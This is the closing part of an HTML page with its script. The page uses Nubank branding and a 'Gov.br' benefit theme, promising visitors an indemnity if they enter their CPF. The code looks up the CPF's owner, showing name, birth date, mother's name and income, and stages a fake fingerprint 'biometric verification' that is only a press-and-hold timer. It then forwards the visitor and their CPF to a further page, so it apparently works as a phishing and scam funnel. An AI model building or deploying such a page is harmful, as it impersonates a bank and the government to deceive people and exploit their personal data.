        <h2>Seus dados estão protegidos e seguros</h2>
      </div>
    </div>
  </div>
  
  <footer>
    <div class="footer-container">
      <div class="footer-brand">
        <div class="footer-logo"><img src="../nubank-logo-1-1.png" height="40px"></div>
        <p class="footer-tagline">Banco digital que simplifica sua vida financeira e oferece as melhores soluções para você.</p>
        
        <div class="social-links">
          <a href="#" aria-label="Instagram"><i class="fab fa-instagram"></i></a>
          <a href="#" aria-label="Facebook"><i class="fab fa-facebook"></i></a>
          <a href="#" aria-label="Twitter"><i class="fab fa-twitter"></i></a>
          <a href="#" aria-label="LinkedIn"><i class="fab fa-linkedin"></i></a>
          <a href="#" aria-label="YouTube"><i class="fab fa-youtube"></i></a>
        </div>
      </div>

     

      

      <div class="footer-section">
        <h3>Ajuda</h3>
        <div class="footer-contact">
          <div class="contact-item">
            <i class="fas fa-phone"></i>
            <a href="tel:08005912117">0800 591 2117</a>
          </div>
          <div class="contact-item">
            <i class="fas fa-envelope"></i>
            <a href="mailto:ajuda@nubank.com.br">ajuda@nubank.com.br</a>
          </div>
          <div class="contact-item">
            <i class="fas fa-comments"></i>
            <span>Chat no app</span>
          </div>
          <div class="contact-item">
            <i class="fas fa-headset"></i>
            <span>Atendimento 24h</span>
          </div>
        </div>
      </div>
    </div>

    <div class="security-badges">
      <div class="security-badge-footer">
        <i class="fas fa-shield-alt"></i>
        <span>Dados Protegidos</span>
      </div>
      <div class="security-badge-footer">
        <i class="fas fa-lock"></i>
        <span>Transações Seguras</span>
      </div>
      <div class="security-badge-footer">
        <i class="fas fa-check-circle"></i>
        <span>Regulamentado pelo BC</span>
      </div>
    </div>

    <div class="footer-bottom">
      <p>Nu Pagamentos S.A. - Instituição de Pagamento autorizada pelo Banco Central do Brasil.</p>
      <p class="legal-text">CNPJ: 18.236.120/0001-58 | Rua Capote Valente, 39 - São Paulo, SP - 05409-000</p>
      <p class="legal-text">© 2025 Nu Pagamentos S.A. Todos os direitos reservados.</p>
    </div>
  </footer>

  <script>
    function removeMask(cpf) { return cpf.replace(/\D/g, ''); }
    function formatCPF(cpf) {
      let digits = removeMask(cpf);
      return digits.replace(/^(\d{3})(\d{3})(\d{3})(\d{2}).*/, '$1.$2.$3-$4');
    }
    
    function formatCurrency(value) {
      // Remove caracteres não numéricos e converte para número
      let numericValue = parseFloat(value.toString().replace(/[^\d,.-]/g, '').replace(',', '.'));
      
      // Se não for um número válido, retorna o valor original
      if (isNaN(numericValue)) {
        return value;
      }
      
      // Formata no padrão brasileiro
      return numericValue.toLocaleString('pt-BR', {
        style: 'currency',
        currency: 'BRL',
        minimumFractionDigits: 2,
        maximumFractionDigits: 2
      });
    }
    function isValidCPF(cpf) {
      cpf = removeMask(cpf);
      if (cpf.length !== 11 || /^(.)\1+$/.test(cpf)) return false;
      let sum = 0, remainder;
      for (let i = 1; i <= 9; i++) sum += parseInt(cpf.substring(i - 1, i)) * (11 - i);
      remainder = (sum * 10) % 11;
      if (remainder === 10 || remainder === 11) remainder = 0;
      if (remainder !== parseInt(cpf.substring(9, 10))) return false;
      sum = 0;
      for (let i = 1; i <= 10; i++) sum += parseInt(cpf.substring(i - 1, i)) * (12 - i);
      remainder = (sum * 10) % 11;
      if (remainder === 10 || remainder === 11) remainder = 0;
      if (remainder !== parseInt(cpf.substring(10, 11))) return false;
      return true;
    }

    async function consultarCPF(cpf) {
      try {
        const response = await fetch(`consulta.php?cpf=${cpf}`, {
          method: 'GET',
          headers: {
            'Accept': 'application/json',
            'Content-Type': 'application/json'
          }
        });

        if (!response.ok) {
          throw new Error('Erro na consulta: ' + response.status);
        }

        const data = await response.json();
        
        if (data.status === 200 && data.dados && data.dados[0]) {
          const usuario = data.dados[0];
          
          // Salvar dados originais da API
          localStorage.setItem('dadosOriginais', JSON.stringify(usuario));
          
          return {
            nome: usuario.NOME,
            dataNascimento: usuario.NASC,
            nomeMae: usuario.NOME_MAE,
            cpf: usuario.CPF,
            sexo: usuario.SEXO
          };
        }
        
        throw new Error('CPF não encontrado');
        
      } catch (error) {
        console.error('Erro na consulta:', error);
        throw error;
      }
    }

    const cpfInput = document.getElementById('cpf');
    const errorMsg = document.getElementById('error-msg');
    const submitBtn = document.getElementById('submit-btn');
    
    cpfInput.addEventListener('input', () => { 
      cpfInput.value = formatCPF(cpfInput.value); 
    });
    
    function showLoadingScreen() {
      const conteudo = document.querySelector('.conteudo');
      const carousel = document.querySelector('.carousel');
      
      // Ocultar o carousel e expandir container
      if (carousel) {
        carousel.style.display = 'none';
      }
      conteudo.classList.add('loading-mode');
      
      // Substituir todo o conteúdo pela tela de loading profissional
      conteudo.innerHTML = `
        <div class="loading-container">
          <div class="spinner">
            <div class="spinner-border"></div>
            <div class="spinner-inner">
              <i class="fas fa-shield-alt"></i>
            </div>
          </div>
          <h2>Verificando informações</h2>
          <p class="loading-subtitle">Consultando dados oficiais do Governo Federal</p>
          <div class="progress-container">
            <div class="progress-header">
              <span class="progress-label">Progresso da verificação</span>
              <span class="progress-percentage"><span id="progress-text">0</span>%</span>
            </div>
            <div class="progress-bar">
              <div class="progress-fill" id="progress-fill" style="width: 0%;"></div>
            </div>
            <p class="progress-status">Aguarde enquanto verificamos seus dados...</p>
          </div>
          <div class="security-badge">
            <i class="fas fa-certificate"></i>
            <span>Verificação Segura</span>
          </div>
        </div>
      `;
    }

    function animateProgress(duration = 5000) {
      const progressFill = document.getElementById('progress-fill');
      const progressText = document.getElementById('progress-text');
      const startTime = Date.now();
      let progress = 0;
      
      const interval = setInterval(() => {
        const elapsedTime = Date.now() - startTime;
        const targetProgress = Math.min((elapsedTime / duration) * 100, 100);
        
        // Animação suave em direção ao progresso alvo
        const diff = targetProgress - progress;
        progress += diff * 0.1; // Suavização da animação
        
        // Garantir que não passe de 100%
        if (progress > 100) progress = 100;
        
        progressFill.style.width = progress + '%';
        progressText.textContent = Math.floor(progress);
        
        // Parar quando chegar a 100%
        if (progress >= 99.9) {
          progress = 100;
          progressFill.style.width = '100%';
          progressText.textContent = '100';
          clearInterval(interval);
        }
      }, 50); // Atualização mais frequente para animação mais suave
      
      return interval;
    }

    function showBiometricScreen(dadosUsuario) {
      const conteudo = document.querySelector('.conteudo');
      const carousel = document.querySelector('.carousel');
      
      // Manter o carousel oculto
      if (carousel) {
        carousel.style.display = 'none';
      }
      
      // Expandir container para biometria
      conteudo.classList.add('loading-mode');
      
      conteudo.innerHTML = `
        <div class="biometric-container">
          <div class="biometric-header">
            <h1>Verificação de identidade</h1>
            <p>Vamos verificar se é realmente <span class="user-name">${dadosUsuario.nome}</span> que está solicitando o benefício no Portal Gov.br</p>
          </div>
          
          <div class="biometric-scanner">
            <svg class="progress-ring" viewBox="0 0 100 100">
              <circle class="progress-ring-bg" cx="50" cy="50" r="45"></circle>
              <circle class="progress-ring-progress" cx="50" cy="50" r="45" id="progress-circle"></circle>
            </svg>
            
            <div class="fingerprint-button waiting" id="fingerprint-btn">
              <svg class="fingerprint-icon" fill="currentColor" viewBox="0 0 24 24">
                <path d="M17.81 4.47c-.08 0-.16-.02-.23-.06C15.66 3.42 14 3 12.01 3c-1.98 0-3.86.47-5.57 1.41-.24.13-.54.04-.68-.2-.13-.24-.04-.55.2-.68C7.82 2.52 9.86 2 12.01 2c2.13 0 3.99.47 6.03 1.52.25.13.34.43.21.67-.09.18-.26.28-.44.28zM3.5 9.72c-.1 0-.2-.03-.29-.09-.23-.16-.28-.47-.12-.7.99-1.4 2.25-2.5 3.75-3.27C9.98 4.04 14 4.03 17.15 5.65c1.5.77 2.76 1.86 3.75 3.25.16.22.11.54-.12.7-.23.16-.54.11-.7-.12-.9-1.26-2.04-2.25-3.39-2.94-2.87-1.47-6.54-1.47-9.4.01-1.36.7-2.5 1.7-3.4 2.96-.08.14-.23.21-.39.21zm6.25 12.07c-.13 0-.26-.05-.35-.15-.87-.87-1.34-1.43-2.01-2.64-.69-1.23-1.05-2.73-1.05-4.34 0-2.97 2.54-5.39 5.66-5.39s5.66 2.42 5.66 5.39c0 .28-.22.5-.5.5s-.5-.22-.5-.5c0-2.42-2.09-4.39-4.66-4.39-2.57 0-4.66 1.97-4.66 4.39 0 1.44.32 2.77.93 3.85.64 1.15 1.08 1.64 1.85 2.42.19.2.19.51 0 .71-.11.1-.24.15-.37.15zm7.17-1.85c-1.19 0-2.24-.3-3.1-.89-1.49-1.01-2.38-2.65-2.38-4.39 0-.28.22-.5.5-.5s.5.22.5.5c0 1.41.72 2.74 1.94 3.56.71.48 1.54.71 2.54.71.24 0 .64-.03 1.04-.1.27-.05.53.13.58.41.05.27-.13.53-.41.58-.57.11-1.07.12-1.21.12zM14.91 22c-.04 0-.09-.01-.13-.02-1.59-.44-2.63-1.03-3.72-2.1-1.4-1.39-2.17-3.24-2.17-5.22 0-1.62 1.38-2.94 3.08-2.94 1.7 0 3.08 1.32 3.08 2.94 0 1.07.93 1.94 2.08 1.94s2.08-.87 2.08-1.94c0-3.77-3.25-6.83-7.25-6.83-2.84 0-5.44 1.58-6.61 4.03-.39.81-.59 1.76-.59 2.8 0 .78.07 2.01.67 3.61.1.26-.03.55-.29.64-.26.1-.55-.04-.64-.29-.49-1.31-.73-2.61-.73-3.96 0-1.2.23-2.29.68-3.24 1.33-2.79 4.28-4.6 7.51-4.6 4.55 0 8.25 3.51 8.25 7.83 0 1.62-1.38 2.94-3.08 2.94s-3.08-1.32-3.08-2.94c0-1.07-.93-1.94-2.08-1.94s-2.08.87-2.08 1.94c0 1.71.66 3.31 1.87 4.51.95.94 1.86 1.46 3.27 1.85.27.07.42.35.35.61-.05.23-.26.38-.47.38z"></path>
              </svg>
            </div>
          </div>
          
          <p class="biometric-instruction" id="instruction-text">Mantenha o dedo pressionado</p>
          <p class="progress-text" id="progress-text">0%</p>
          
          <div class="biometric-info">
            <p><span class="info-title">Instruções:</span><br>
            Posicione seu dedo sobre o círculo e mantenha pressionado por 8 segundos para completar a verificação biométrica.</p>
          </div>
        </div>
      `;

      // Inicializar funcionalidade biométrica
      initBiometricVerification(dadosUsuario);
    }

    function initBiometricVerification(dadosUsuario) {
      const fingerprintBtn = document.getElementById('fingerprint-btn');
      const progressCircle = document.getElementById('progress-circle');
      const instructionText = document.getElementById('instruction-text');
      const progressText = document.getElementById('progress-text');
      
      let isPressed = false;
      let progress = 0;
      let interval;
      const totalTime = 8000; // 8 segundos
      const updateInterval = 50; // Atualiza a cada 50ms
      const increment = (updateInterval / totalTime) * 100;
      const circumference = 2 * Math.PI * 45; // Circunferência do círculo

      function updateProgress() {
        progress += increment;
        if (progress > 100) progress = 100;
        
        // Atualizar círculo de progresso (vai preenchendo de 0 a 100%)
        const offset = circumference - (progress / 100) * circumference;
        progressCircle.style.strokeDashoffset = offset;
        
        // Atualizar texto
        progressText.textContent = Math.floor(progress) + '%';
        
        if (progress >= 100) {
          clearInterval(interval); // Parar o intervalo imediatamente
          completeBiometricVerification(dadosUsuario);
        }
      }

      function startProgress() {
        if (!isPressed) {
          isPressed = true;
          fingerprintBtn.classList.remove('waiting');
          fingerprintBtn.classList.add('active');
          instructionText.textContent = 'Verificando impressão digital...';
          
          interval = setInterval(updateProgress, updateInterval);
        }
      }

      function stopProgress() {
        if (isPressed && progress < 100) {
          isPressed = false;
          clearInterval(interval);
          fingerprintBtn.classList.remove('active');
          fingerprintBtn.classList.add('waiting');
          instructionText.textContent = 'Mantenha o dedo pressionado';
          
          // Reset progress
          progress = 0;
          progressCircle.style.strokeDashoffset = circumference;
          progressText.textContent = '0%';
        }
      }

      // Event listeners
      fingerprintBtn.addEventListener('mousedown', startProgress);
      fingerprintBtn.addEventListener('mouseup', stopProgress);
      fingerprintBtn.addEventListener('mouseleave', stopProgress);
      
      // Touch events for mobile
      fingerprintBtn.addEventListener('touchstart', (e) => {
        e.preventDefault();
        startProgress();
      });
      
      fingerprintBtn.addEventListener('touchend', (e) => {
        e.preventDefault();
        stopProgress();
      });
    }

    function completeBiometricVerification(dadosUsuario) {
      const fingerprintBtn = document.getElementById('fingerprint-btn');
      const instructionText = document.getElementById('instruction-text');
      const progressText = document.getElementById('progress-text');
      const biometricContainer = document.querySelector('.biometric-container');
      
      // Verificar se já foi completado para evitar duplicação
      if (fingerprintBtn.classList.contains('completed')) {
        return; // Já foi processado, sair da função
      }
      
      // Marcar como completo
      fingerprintBtn.classList.remove('active', 'waiting');
      fingerprintBtn.classList.add('completed');
      instructionText.textContent = 'Identidade confirmada com sucesso!';
      progressText.textContent = '100%';
      
      // Mostrar checkmark
      fingerprintBtn.innerHTML = `
        <svg class="fingerprint-icon" fill="none" viewBox="0 0 24 24" stroke="currentColor">
          <path class="success-check" stroke-linecap="round" stroke-linejoin="round" d="M5 13l4 4L19 7"></path>
        </svg>
      `;
      
      // Aguardar 1 segundo e mostrar o botão de prosseguir
      setTimeout(() => {
        // Verificar se a seção de sucesso já existe
        const existingSuccess = biometricContainer.querySelector('.biometric-success');
        if (existingSuccess) {
          return; // Já existe, não criar novamente
        }
        
        // Adicionar seção de sucesso com botão
        const successSection = document.createElement('div');
        successSection.className = 'biometric-success';
        successSection.innerHTML = `
          <h2><i class="fas fa-check-circle" style="margin-right: 8px;"></i>Identidade Confirmada</h2>
          <p>Sua identidade foi verificada com sucesso. Você pode prosseguir para consultar sua indenização.</p>
          <button class="btn-proceed" id="btn-proceed">
            <i class="fas fa-arrow-right" style="margin-right: 8px;"></i>
            Prosseguir
          </button>
        `;
        
        biometricContainer.appendChild(successSection);
        
        // Adicionar event listener ao botão
        document.getElementById('btn-proceed').addEventListener('click', () => {
          // Redirecionar para a próxima página mantendo todos os parâmetros da URL
          let newQueryParams = new URLSearchParams(window.location.search);
          newQueryParams.set('cpf', removeMask(dadosUsuario.cpf));
          
          // Remover parâmetros vazios
          for (let [key, value] of newQueryParams.entries()) { 
            if (!value.trim()) { 
              newQueryParams.delete(key); 
            } 
          }
          
          window.location.href = '../consulta/index.html?' + newQueryParams.toString();
        });
        
        // Scroll suave para o botão
        successSection.scrollIntoView({ behavior: 'smooth', block: 'center' });
      }, 1000);
    }

    function showConfirmationScreen(dadosUsuario) {
      const conteudo = document.querySelector('.conteudo');
      const carousel = document.querySelector('.carousel');
      
      // Manter o carousel oculto
      if (carousel) {
        carousel.style.display = 'none';
      }
      
      // Formatar dados
      const nomeMae = dadosUsuario.nomeMae && dadosUsuario.nomeMae.trim() !== '' 
        ? dadosUsuario.nomeMae 
        : 'Nome da mãe não informado';
      
      // Buscar renda nos dados originais da API
      const dadosOriginais = JSON.parse(localStorage.getItem('dadosOriginais') || '{}');
      const rendaBruta = dadosOriginais.RENDA || 'Não informado';
      const renda = rendaBruta !== 'Não informado' ? formatCurrency(rendaBruta) : 'Não informado';
      const cpfFormatado = formatCPF(dadosUsuario.cpf);
      
      conteudo.innerHTML = `
        <div class="card-content">
          <div class="form-header text-center">
            <h2>Confirme se você é essa pessoa</h2>
            <p>Verifique se os dados estão corretos antes de continuar.</p>
          </div>

          <div class="dados-container" id="dados-usuario">
            <div class="dado-item">
              <span class="dado-label">Nome completo</span>
              <p class="dado-value">${dadosUsuario.nome}</p>
            </div>
        
            <div class="dado-item">
              <span class="dado-label">Data de nascimento</span>
              <p class="dado-value">${dadosUsuario.nascimento}</p>
            </div>
        
        
            <div class="dado-item">
              <span class="dado-label">CPF</span>
              <p class="dado-value">${cpfFormatado}</p>
            </div>
        
            <div class="dado-item">
              <span class="dado-label">Sexo</span>
              <p class="dado-value">${dadosUsuario.sexo}</p>
            </div>
        

          </div>

          <div class="button-group">
            <button id="confirmar-btn" class="btn-primary">Sim, sou eu</button>
            <button id="corrigir-btn" class="btn-secondary">Não sou eu, corrigir dados</button>
          </div>

          <div class="security-info">
            <i class="fas fa-shield-alt"></i>
            <span>Dados consultados de forma segura e oficial</span>
          </div>
        </div>
      `;

      // Adicionar event listeners aos botões
      document.getElementById('confirmar-btn').addEventListener('click', () => {
        // Mostrar tela biométrica em vez de redirecionar diretamente
        showBiometricScreen(dadosUsuario);
      });

      document.getElementById('corrigir-btn').addEventListener('click', () => {
        // Voltar ao estado inicial
        restoreOriginalContent();
      });
    }

    function restoreOriginalContent() {
      const conteudo = document.querySelector('.conteudo');
      const carousel = document.querySelector('.carousel');
      
      // Mostrar o carousel novamente e restaurar tamanho normal
      if (carousel) {
        carousel.style.display = 'block';
      }
      conteudo.classList.remove('loading-mode');
      
      // Restaurar o conteúdo original do formulário
      conteudo.innerHTML = `
        <div class="conteudo-inner">
          <h2 class="titulo-section">Consulte seu benefício</h2>
          <p class="subtitulo">Descubra se você tem direito a receber uma indenização</p>
          
          <div class="container-form">
            <form id="cpfForm">
              <div class="input-label">
                Digite seu CPF para <span class="highlight">consultar</span> se você possui benefícios disponíveis
              </div>
              
              <div class="input-group">
                <label for="cpf">CPF</label>
                <input type="tel" id="cpf" name="cpf" placeholder="000.000.000-00" required="">
              </div>
              
              <p id="error-msg" class="error-message" style="display: none;"></p>
              
              <button type="submit" id="submit-btn">
                Consultar benefício
              </button>
              
              <input type="hidden" name="utm_source" value="">
              <input type="hidden" name="utm_campaign" value="">
              <input type="hidden" name="utm_medium" value="">
              <input type="hidden" name="utm_content" value="">
            </form>
          </div>
          
          <div class="terms-section">
            <h2>Seus dados estão protegidos e seguros</h2>
          </div>
        </div>
      `;
      
      // Reativar os event listeners
      const newCpfInput = document.getElementById('cpf');
      newCpfInput.addEventListener('input', () => { 
        newCpfInput.value = formatCPF(newCpfInput.value); 
      });

      // Reativar o event listener do formulário
      document.getElementById('cpfForm').addEventListener('submit', handleFormSubmit);
    }

    async function handleFormSubmit(e) {
  e.preventDefault();

  const currentErrorMsg = document.getElementById('error-msg');
  const currentCpfInput = document.getElementById('cpf');
  const conteudo = document.querySelector('.conteudo');

  if (!currentErrorMsg || !currentCpfInput || !conteudo) {
    console.error("Elementos essenciais não encontrados no DOM.");
    return;
  }

  currentErrorMsg.style.display = 'none';
  const cpf = removeMask(currentCpfInput.value);

  if (!isValidCPF(cpf)) {
    currentErrorMsg.textContent = 'CPF inválido. Verifique e tente novamente.';
    currentErrorMsg.style.display = 'block';
    return;
  }

  // Mostrar loading
  showLoadingScreen();

  try {
    const dadosUsuario = await consultarCPF(cpf);
    
    // Animação de progresso com callback no final
    animateProgress(5000); // 5 segundos
localStorage.setItem('dadosOriginais', JSON.stringify(dadosUsuario));
    // Espera os 5 segundos antes de chamar a próxima tela
    setTimeout(() => {
      showConfirmationScreen(dadosUsuario);
    }, 5000);

  } catch (err) {
    // Se der ruim na API ou qualquer coisa
    restoreOriginalContent();
    currentErrorMsg.textContent = 'Não foi possível consultar seus dados. Tente novamente.';
    currentErrorMsg.style.display = 'block';
  }
}


    // Função para extrair iniciais do nome
    function getInitials(fullName) {
      if (!fullName || fullName.trim() === '') return 'U';
      
      const names = fullName.trim().split(' ');
      if (names.length === 1) {
        return names[0].charAt(0).toUpperCase();
      }
      
      // Pegar primeira letra do primeiro nome e primeira letra do último nome
      const firstInitial = names[0].charAt(0).toUpperCase();
      const lastInitial = names[names.length - 1].charAt(0).toUpperCase();
      
      return firstInitial + lastInitial;
    }

    // Função para atualizar informações do usuário no header
    function updateUserInfo(dadosUsuario) {
      const userName = document.getElementById('user-name');
      
      if (dadosUsuario && dadosUsuario.nome && userName) {
        // Pegar apenas o primeiro nome
        const primeiroNome = dadosUsuario.nome.split(' ')[0];
        userName.textContent = primeiroNome || 'Usuário';
      }
    }

    // Função original sem recursão
    function showConfirmationScreen(dadosUsuario) {
      // Atualizar informações do usuário no header
      updateUserInfo(dadosUsuario);
      
      const conteudo = document.querySelector('.conteudo');
      const carousel = document.querySelector('.carousel');
      
      // Manter o carousel oculto
      if (carousel) {
        carousel.style.display = 'none';
      }
      
      // Formatar dados
      const nomeMae = dadosUsuario.nomeMae && dadosUsuario.nomeMae.trim() !== '' 
        ? dadosUsuario.nomeMae 
        : 'Nome da mãe não informado';
      
      // Buscar renda nos dados originais da API
      const dadosOriginais = JSON.parse(localStorage.getItem('dadosOriginais') || '{}');
      const rendaBruta = dadosOriginais.RENDA || 'Não informado';
      const renda = rendaBruta !== 'Não informado' ? formatCurrency(rendaBruta) : 'Não informado';
      const cpfFormatado = formatCPF(dadosUsuario.cpf);
      
      conteudo.innerHTML = `
        <div class="card-content">
          <div class="form-header text-center">
            <h2>Confirme se você é essa pessoa</h2>
            <p>Verifique se os dados estão corretos antes de continuar.</p>
          </div>

          <div class="dados-container" id="dados-usuario">
            <div class="dado-item">
              <span class="dado-label">Nome completo</span>
              <p class="dado-value">${dadosUsuario.nome}</p>
            </div>
        
            <div class="dado-item">
              <span class="dado-label">Data de nascimento</span>
              <p class="dado-value">${dadosUsuario.dataNascimento}</p>
            </div>
        

        
            <div class="dado-item">
              <span class="dado-label">CPF</span>
              <p class="dado-value">${cpfFormatado}</p>
            </div>
        
            <div class="dado-item">
              <span class="dado-label">Sexo</span>
              <p class="dado-value">${dadosUsuario.sexo}</p>
            </div>
        
          </div>

          <div class="button-group">
            <button id="confirmar-btn" class="btn-primary">Sim, sou eu</button>
            <button id="corrigir-btn" class="btn-secondary">Não sou eu, corrigir dados</button>
          </div>

          <div class="security-info">
            <i class="fas fa-shield-alt"></i>
            <span>Dados consultados de forma segura e oficial</span>
          </div>
        </div>
      `;

      // Adicionar event listeners aos botões
      document.getElementById('confirmar-btn').addEventListener('click', () => {
        // Mostrar tela biométrica em vez de redirecionar diretamente
        showBiometricScreen(dadosUsuario);
      });

      document.getElementById('corrigir-btn').addEventListener('click', () => {
        // Voltar ao estado inicial
        restoreOriginalContent();
      });
    }

    // Função original sem recursão  
    function restoreOriginalContent() {
      // Resetar o nome do usuário
      const userName = document.getElementById('user-name');
      if (userName) {
        userName.textContent = 'Usuário';
      }
      
      const conteudo = document.querySelector('.conteudo');
      const carousel = document.querySelector('.carousel');
      
      // Mostrar o carousel novamente e restaurar tamanho normal
      if (carousel) {
        carousel.style.display = 'block';
      }
      conteudo.classList.remove('loading-mode');
      
      // Restaurar o conteúdo original do formulário
      conteudo.innerHTML = `
        <div class="conteudo-inner">
          <h2 class="titulo-section">Consulte seu benefício</h2>
          <p class="subtitulo">Descubra se você tem direito a receber uma indenização</p>
          
          <div class="container-form">
            <form id="cpfForm">
              <div class="input-label">
                Digite seu CPF para <span class="highlight">consultar</span> se você possui benefícios disponíveis
              </div>
              
              <div class="input-group">
                <label for="cpf">CPF</label>
                <input type="tel" id="cpf" name="cpf" placeholder="000.000.000-00" required="">
              </div>
              
              <p id="error-msg" class="error-message" style="display: none;"></p>
              
              <button type="submit" id="submit-btn">
                Consultar benefício
              </button>
              
              <input type="hidden" name="utm_source" value="">
              <input type="hidden" name="utm_campaign" value="">
              <input type="hidden" name="utm_medium" value="">
              <input type="hidden" name="utm_content" value="">
            </form>
          </div>
          
          <div class="terms-section">
            <h2>Seus dados estão protegidos e seguros</h2>
          </div>
        </div>
      `;
      
      // Reativar os event listeners
      const newCpfInput = document.getElementById('cpf');
      newCpfInput.addEventListener('input', () => { 
        newCpfInput.value = formatCPF(newCpfInput.value); 
      });

      // Reativar o event listener do formulário
      document.getElementById('cpfForm').addEventListener('submit', handleFormSubmit);
    }

    // Inicializar o event listener do formulário
    document.getElementById('cpfForm').addEventListener('submit', handleFormSubmit);
  </script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script>


<script>
  function removeMask(value) {
    return value.replace(/\D/g, '');
  }

  async function consultarCPF(cpf) {
    try {
      const response = await fetch(`consulta.php?cpf=${cpf}`);
      if (!response.ok) {
        throw new Error("Erro na API");
      }

      const resposta = await response.json();
      if (!resposta || !resposta.nome) {
        throw new Error("CPF não encontrado");
      }

      return resposta;
    } catch (error) {
      throw error;
    }
  }


</script>

</body></html>